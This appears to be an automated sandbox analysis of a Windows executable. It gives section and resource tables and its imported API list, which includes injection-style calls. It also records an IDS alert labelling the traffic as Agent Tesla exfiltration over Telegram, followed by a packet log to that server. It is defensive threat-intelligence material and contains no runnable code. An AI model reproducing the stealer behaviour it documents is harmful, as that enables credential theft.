.reloc | 0x259000 | 0x634 | 0x800 | 8b35b44373572aa9287a6c541ff3e534 | False | 0.48681640625 | data | 4.726579003687373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
BINARY | 0x21d12c | 0x3aa84 | data | | | 1.000337134770665
RT_VERSION | 0x257bb0 | 0x3b4 | data | | | 0.35337552742616035
RT_MANIFEST | 0x257f64 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
ADVAPI32.dll | RegCloseKey, RegEnumKeyExW, RegEnumValueW, RegOpenKeyExW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegSetValueExA, GetTokenInformation, DuplicateTokenEx, OpenThreadToken, RevertToSelf, ImpersonateLoggedOnUser, CheckTokenMembership, EventWrite, EventRegister, EventEnabled
bcrypt.dll | BCryptGenRandom, BCryptEncrypt, BCryptDecrypt, BCryptImportKey, BCryptOpenAlgorithmProvider, BCryptSetProperty, BCryptCloseAlgorithmProvider, BCryptDestroyKey
KERNEL32.dll | TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, RaiseException, RtlPcToFileHeader, CloseThreadpoolIo, GetStdHandle, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToSystemTime, GetSystemTime, GetCalendarInfoEx, CompareStringOrdinal, CompareStringEx, FindNLSStringEx, GetLocaleInfoEx, ResolveLocaleName, GetUserPreferredUILanguages, FindStringOrdinal, GetTickCount64, GetCurrentProcess, GetCurrentThread, Sleep, InitializeCriticalSection, InitializeConditionVariable, DeleteCriticalSection, LocalFree, EnterCriticalSection, SleepConditionVariableCS, LeaveCriticalSection, WakeConditionVariable, QueryPerformanceCounter, WaitForMultipleObjectsEx, GetLastError, QueryPerformanceFrequency, SetLastError, GetFullPathNameW, GetLongPathNameW, MultiByteToWideChar, WideCharToMultiByte, LocalAlloc, GetConsoleOutputCP, GetProcAddress, RaiseFailFastException, CreateThreadpoolIo, StartThreadpoolIo, CancelThreadpoolIo, LocaleNameToLCID, LCMapStringEx, EnumTimeFormatsEx, EnumCalendarInfoExEx, CopyFileExW, CreateFileW, DeleteFileW, DeviceIoControl, ExpandEnvironmentStringsW, FindClose, FindFirstFileExW, FlushFileBuffers, FreeLibrary, GetFileAttributesExW, GetFileInformationByHandleEx, GetFileType, GetModuleFileNameW, GetOverlappedResult, GetSystemDirectoryW, LoadLibraryExW, ReadFile, SetFileInformationByHandle, SetThreadErrorMode, GetDynamicTimeZoneInformation, GetTimeZoneInformation, WriteFile, GetCurrentProcessorNumberEx, CloseHandle, SetEvent, CreateEventExW, GetEnvironmentVariableW, FormatMessageW, DuplicateHandle, GetThreadPriority, SetThreadPriority, GetConsoleMode, WriteConsoleW, GetExitCodeProcess, TerminateProcess, OpenProcess, K32EnumProcesses, GetProcessId, CreateProcessA, GetConsoleWindow, FreeConsole, AllocConsole, VirtualAllocEx, ResumeThread, CreateProcessW, GetThreadContext, SetThreadContext, FlushProcessWriteBuffers, GetCurrentThreadId, WaitForSingleObjectEx, VirtualQuery, RtlRestoreContext, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, SwitchToThread, CreateThread, SuspendThread, FlushInstructionCache, VirtualAlloc, VirtualProtect, VirtualFree, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, InitializeCriticalSectionEx, GetSystemTimeAsFileTime, ResetEvent, DebugBreak, WaitForSingleObject, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, RtlUnwindEx, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, InitializeSListHead, GetCurrentProcessId
ole32.dll | CoUninitialize, CoTaskMemAlloc, CoGetApartmentType, CoCreateGuid, CoTaskMemFree, CoWaitForMultipleHandles, CoInitializeEx
USER32.dll | LoadStringW
api-ms-win-crt-math-l1-1-0.dll | pow, modf, ceil, __setusermatherr
api-ms-win-crt-heap-l1-1-0.dll | calloc, malloc, _callnewh, _set_new_mode, free
api-ms-win-crt-string-l1-1-0.dll | wcsncmp, strncpy_s, _stricmp, strcpy_s, strcmp, _wcsicmp
api-ms-win-crt-runtime-l1-1-0.dll | _c_exit, _register_thread_local_exe_atexit_callback, _get_initial_wide_environment, _cexit, __p___wargv, __p___argc, _exit, exit, _initterm_e, _initterm, terminate, _crt_atexit, _initialize_wide_environment, _configure_wide_argv, _register_onexit_function, _initialize_onexit_table, _set_app_type, _seh_filter_exe, abort
api-ms-win-crt-stdio-l1-1-0.dll | __stdio_common_vsprintf_s, __stdio_common_vsscanf, __stdio_common_vfprintf, __acrt_iob_func, _set_fmode, __p__commode
api-ms-win-crt-locale-l1-1-0.dll | _configthreadlocale
Name | Ordinal | Address
DotNetRuntimeDebugHeader | 1 | 0x1401fb360
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/24/24-07:41:27.363485 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49700 | 443 | 192.168.2.7 | 149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 24, 2024 07:41:23.924833059 CEST | 49699 | 443 | 192.168.2.7 | 104.26.13.205
May 24, 2024 07:41:23.924913883 CEST | 443 | 49699 | 104.26.13.205 | 192.168.2.7
May 24, 2024 07:41:23.925071001 CEST | 49699 | 443 | 192.168.2.7 | 104.26.13.205
May 24, 2024 07:41:23.934068918 CEST | 49699 | 443 | 192.168.2.7 | 104.26.13.205
May 24, 2024 07:41:23.934109926 CEST | 443 | 49699 | 104.26.13.205 | 192.168.2.7
May 24, 2024 07:41:24.427206993 CEST | 443 | 49699 | 104.26.13.205 | 192.168.2.7
May 24, 2024 07:41:24.430510998 CEST | 49699 | 443 | 192.168.2.7 | 104.26.13.205
May 24, 2024 07:41:24.433792114 CEST | 49699 | 443 | 192.168.2.7 | 104.26.13.205
May 24, 2024 07:41:24.433804035 CEST | 443 | 49699 | 104.26.13.205 | 192.168.2.7
May 24, 2024 07:41:24.434262991 CEST | 443 | 49699 | 104.26.13.205 | 192.168.2.7
May 24, 2024 07:41:24.484770060 CEST | 49699 | 443 | 192.168.2.7 | 104.26.13.205
May 24, 2024 07:41:24.550529003 CEST | 49699 | 443 | 192.168.2.7 | 104.26.13.205
May 24, 2024 07:41:24.594496012 CEST | 443 | 49699 | 104.26.13.205 | 192.168.2.7
May 24, 2024 07:41:24.727719069 CEST | 443 | 49699 | 104.26.13.205 | 192.168.2.7
May 24, 2024 07:41:24.727797985 CEST | 443 | 49699 | 104.26.13.205 | 192.168.2.7
May 24, 2024 07:41:24.727855921 CEST | 49699 | 443 | 192.168.2.7 | 104.26.13.205
May 24, 2024 07:41:24.762111902 CEST | 49699 | 443 | 192.168.2.7 | 104.26.13.205
May 24, 2024 07:41:26.351636887 CEST | 49700 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:41:26.351670027 CEST | 443 | 49700 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:41:26.351743937 CEST | 49700 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:41:26.356568098 CEST | 49700 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:41:26.356578112 CEST | 443 | 49700 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:41:27.039228916 CEST | 443 | 49700 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:41:27.039350033 CEST | 49700 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:41:27.043437004 CEST | 49700 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:41:27.043468952 CEST | 443 | 49700 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:41:27.044286013 CEST | 443 | 49700 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:41:27.045720100 CEST | 49700 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:41:27.086507082 CEST | 443 | 49700 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:41:27.363028049 CEST | 443 | 49700 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:41:27.363426924 CEST | 49700 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:41:27.363440037 CEST | 443 | 49700 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:41:27.546787024 CEST | 443 | 49700 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:41:27.554105043 CEST | 443 | 49700 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:41:27.554193020 CEST | 49700 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:41:27.561944962 CEST | 49700 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:04.491204023 CEST | 49707 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:04.491242886 CEST | 443 | 49707 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:04.491478920 CEST | 49707 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:04.491741896 CEST | 49707 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:04.491755962 CEST | 443 | 49707 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:05.140644073 CEST | 443 | 49707 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:05.153351068 CEST | 49707 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:05.153387070 CEST | 443 | 49707 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:05.458123922 CEST | 443 | 49707 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:05.463529110 CEST | 49707 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:05.463572025 CEST | 443 | 49707 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:05.463655949 CEST | 49707 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:05.463674068 CEST | 443 | 49707 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:05.463751078 CEST | 49707 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:05.463850975 CEST | 443 | 49707 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:05.824532986 CEST | 443 | 49707 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:05.827380896 CEST | 49707 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:05.827476978 CEST | 443 | 49707 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:05.827528954 CEST | 49707 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:19.526411057 CEST | 49708 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:19.526478052 CEST | 443 | 49708 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:19.526567936 CEST | 49708 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:19.526850939 CEST | 49708 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:19.526870012 CEST | 443 | 49708 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:20.041618109 CEST | 49709 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:20.041699886 CEST | 443 | 49709 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:20.041804075 CEST | 49709 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:20.042814970 CEST | 49709 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:20.042853117 CEST | 443 | 49709 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:20.048840046 CEST | 49708 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:20.094533920 CEST | 443 | 49708 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:20.166589975 CEST | 443 | 49708 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:20.166743040 CEST | 49708 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:20.166743040 CEST | 49708 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:20.166769981 CEST | 443 | 49708 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:20.174120903 CEST | 49708 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:20.685791016 CEST | 443 | 49709 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:20.685970068 CEST | 49709 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:20.688739061 CEST | 49709 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:20.688750982 CEST | 443 | 49709 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:20.689094067 CEST | 443 | 49709 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:20.690933943 CEST | 49709 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:20.734499931 CEST | 443 | 49709 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:21.006686926 CEST | 443 | 49709 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:21.007097006 CEST | 49709 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:21.007189035 CEST | 443 | 49709 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:21.007317066 CEST | 49709 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:21.007354975 CEST | 443 | 49709 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:21.007469893 CEST | 49709 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:21.007663012 CEST | 443 | 49709 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:21.360924959 CEST | 443 | 49709 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:21.361623049 CEST | 49709 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:21.361717939 CEST | 443 | 49709 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:21.361779928 CEST | 49709 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:36.938378096 CEST | 49710 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:36.938431025 CEST | 443 | 49710 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:36.938508034 CEST | 49710 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:36.938879967 CEST | 49710 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:36.938899994 CEST | 443 | 49710 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:37.569605112 CEST | 443 | 49710 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:37.569741964 CEST | 49710 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:37.571320057 CEST | 49710 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:37.571330070 CEST | 443 | 49710 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:37.572242975 CEST | 443 | 49710 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:37.573816061 CEST | 49710 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:37.618504047 CEST | 443 | 49710 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:37.761184931 CEST | 49710 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:37.761327028 CEST | 443 | 49710 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:37.761413097 CEST | 49710 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:37.761653900 CEST | 49711 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:37.761689901 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:37.761782885 CEST | 49711 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:37.762123108 CEST | 49711 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:37.762144089 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:38.396276951 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:38.396534920 CEST | 49711 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:38.397692919 CEST | 49711 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:38.397708893 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:38.398382902 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:38.399907112 CEST | 49711 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:38.446510077 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:38.669289112 CEST | 49712 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:38.669332981 CEST | 443 | 49712 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:38.669435978 CEST | 49712 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:38.669733047 CEST | 49712 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:38.669747114 CEST | 443 | 49712 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:38.707951069 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:38.708811045 CEST | 49711 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:38.708904028 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:38.709172964 CEST | 49711 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:38.709208965 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:38.709424019 CEST | 49711 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:38.709456921 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:39.067169905 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:39.067949057 CEST | 49711 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:39.068043947 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:39.068100929 CEST | 49711 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:39.299292088 CEST | 443 | 49712 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:39.299370050 CEST | 49712 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:39.301453114 CEST | 49712 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:39.301465988 CEST | 443 | 49712 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:39.302035093 CEST | 443 | 49712 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:39.303654909 CEST | 49712 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:39.350497961 CEST | 443 | 49712 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:39.619796991 CEST | 443 | 49712 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:39.620284081 CEST | 49712 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:39.620313883 CEST | 443 | 49712 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:39.620409012 CEST | 49712 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:39.620426893 CEST | 443 | 49712 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:39.620501041 CEST | 49712 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:39.620558977 CEST | 443 | 49712 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:39.976109982 CEST | 443 | 49712 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:39.976650000 CEST | 49712 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:39.976737022 CEST | 443 | 49712 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:39.976804018 CEST | 49712 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:41.667437077 CEST | 49713 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:41.667488098 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:41.667761087 CEST | 49713 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:41.667879105 CEST | 49713 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:41.667892933 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:42.294385910 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:42.294502974 CEST | 49713 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:42.297269106 CEST | 49713 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:42.297277927 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:42.297755957 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:42.302982092 CEST | 49713 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:42.346498966 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:42.656953096 CEST | 49713 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:42.656997919 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:42.657964945 CEST | 49713 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:42.657994986 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:42.658117056 CEST | 49713 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:42.658178091 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:42.662657022 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:42.828588963 CEST | 49713 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:43.008322001 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:43.008865118 CEST | 49713 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:43.008914948 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:43.009124994 CEST | 49713 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:43.009130001 CEST | 443 | 49713 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:43.009192944 CEST | 49713 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:56.914937973 CEST | 49714 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:56.914963961 CEST | 443 | 49714 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:56.915044069 CEST | 49714 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:56.915550947 CEST | 49714 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:56.915561914 CEST | 443 | 49714 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:57.603106976 CEST | 443 | 49714 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:57.603250980 CEST | 49714 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:57.608870029 CEST | 49714 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:57.608884096 CEST | 443 | 49714 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:57.609103918 CEST | 443 | 49714 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:57.612811089 CEST | 49714 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:57.654504061 CEST | 443 | 49714 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:57.955852985 CEST | 443 | 49714 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:57.956625938 CEST | 49714 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:57.956650019 CEST | 443 | 49714 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:57.956756115 CEST | 49714 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:57.956772089 CEST | 443 | 49714 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:57.956847906 CEST | 49714 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:57.956882954 CEST | 443 | 49714 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:58.322957039 CEST | 443 | 49714 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:58.323627949 CEST | 49714 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:58.323668003 CEST | 443 | 49714 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:58.323726892 CEST | 49714 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:58.768740892 CEST | 49715 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:58.768779993 CEST | 443 | 49715 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:58.768862963 CEST | 49715 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:58.769334078 CEST | 49715 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:58.769345045 CEST | 443 | 49715 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:59.491647959 CEST | 443 | 49715 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:59.491899014 CEST | 49715 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:59.493669033 CEST | 49715 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:59.493684053 CEST | 443 | 49715 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:59.494458914 CEST | 443 | 49715 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:59.498790979 CEST | 49715 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:59.546495914 CEST | 443 | 49715 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:59.844440937 CEST | 49715 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:59.844475031 CEST | 443 | 49715 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:59.844605923 CEST | 49715 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:59.844615936 CEST | 443 | 49715 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:43:59.844719887 CEST | 49715 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:43:59.844727993 CEST | 443 | 49715 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:44:00.004981995 CEST | 443 | 49715 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:44:00.047462940 CEST | 49715 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:44:00.340517998 CEST | 443 | 49715 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:44:00.341236115 CEST | 49715 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:44:00.341291904 CEST | 443 | 49715 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:44:00.341348886 CEST | 49715 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:44:05.862195015 CEST | 49716 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:44:05.862260103 CEST | 443 | 49716 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:44:05.862400055 CEST | 49716 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:44:05.863032103 CEST | 49716 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:44:05.863051891 CEST | 443 | 49716 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:44:06.492007971 CEST | 443 | 49716 | 149.154.167.220 | 192.168.2.7
May 24, 2024 07:44:06.492077112 CEST | 49716 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:44:06.494292021 CEST | 49716 | 443 | 192.168.2.7 | 149.154.167.220
May 24, 2024 07:44:06.494298935 CEST | 443 | 49716 | 149.154.167.220 | 192.168.2.7
                                                May 24, 2024 07:44:06.494534969 CEST44349716149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:06.496836901 CEST49716443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:06.542500019 CEST44349716149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:06.834712029 CEST44349716149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:06.835235119 CEST49716443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:06.835258961 CEST44349716149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:06.835335016 CEST49716443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:06.835361004 CEST44349716149.154.167.220192.168.2.7
                                                May 24, 2024 07:44:06.835447073 CEST49716443192.168.2.7149.154.167.220
                                                May 24, 2024 07:44:06.835473061 CEST44349716149.154.167.220192.168.2.7
